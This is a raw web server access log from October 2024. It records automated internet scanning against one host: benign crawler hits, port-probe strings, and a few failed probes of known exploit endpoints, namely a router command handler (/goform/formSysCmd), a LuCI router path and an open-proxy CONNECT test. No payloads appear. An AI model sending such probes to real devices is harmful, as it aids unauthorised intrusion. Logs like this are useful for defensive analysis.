198.235.24.60 - - [04/Oct/2024:00:18:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
48.216.196.147 - - [04/Oct/2024:00:19:09 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:19:31 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:19:44 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:19:46 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:19:56 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:19:59 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
104.42.197.251 - - [04/Oct/2024:00:20:04 +0200] "POST /goform/formSysCmd HTTP/1.1" 400 329 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:20:30 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:20:56 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
48.216.196.147 - - [04/Oct/2024:00:21:08 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
179.43.133.162 - - [04/Oct/2024:00:21:45 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
141.98.11.79 - - [04/Oct/2024:00:22:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [04/Oct/2024:00:26:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
165.154.206.222 - - [04/Oct/2024:00:28:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/588.47 (KHTML, like Gecko) Chrome/102.0.473 Safari/537.36"
165.154.206.222 - - [04/Oct/2024:00:28:49 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.206.222 - - [04/Oct/2024:00:28:50 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
165.154.206.222 - - [04/Oct/2024:00:28:50 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
149.50.103.48 - - [04/Oct/2024:00:29:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.15 - - [04/Oct/2024:00:29:49 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
